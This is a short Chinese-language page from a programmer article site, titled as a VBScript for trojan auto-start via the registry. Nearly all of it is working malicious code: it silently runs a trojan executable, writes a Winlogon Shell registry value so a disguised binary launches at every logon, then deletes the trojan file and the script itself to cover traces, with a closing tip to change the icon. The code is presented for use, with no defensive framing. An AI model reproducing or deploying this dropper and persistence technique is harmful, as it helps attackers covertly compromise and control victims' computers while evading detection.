欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

vbs 注册表实现木马自启动

程序员文章站 2022-04-10 08:01:15
呵呵~不过别人一般没这个闲工夫检查那么多位置的!就连我也做不到~~ 复制代码 代码如下:dim wsh set wsh=createobject("wscript.shel...
呵呵~不过别人一般没这个闲工夫检查那么多位置的!就连我也做不到~~
复制代码 代码如下:

dim wsh
set wsh=createobject("wscript.shell")
wsh.run "%windir%\flumasko.exe",0 //运行木马程序
set sm=wscript.createobject("wscript.shell")
sm.regwrite "hklm\software\microsoft\windows nt\currentversion\winlogon\shell","explorer.exe %systemroot%\system32\winmgmt.exe"
//写进注册表项实现自启动
set wshshell=wscript.createobject("wscript.shell")
wscript.sleep 2000
//等木马的执行完毕
set fso=createobject("scripting.filesystemobject")
f=fso.deletefile ("flumasko.exe")
f=fso.deletefile (wscript.scriptname)
//毁尸灭迹
再修改下图标就大功告成了!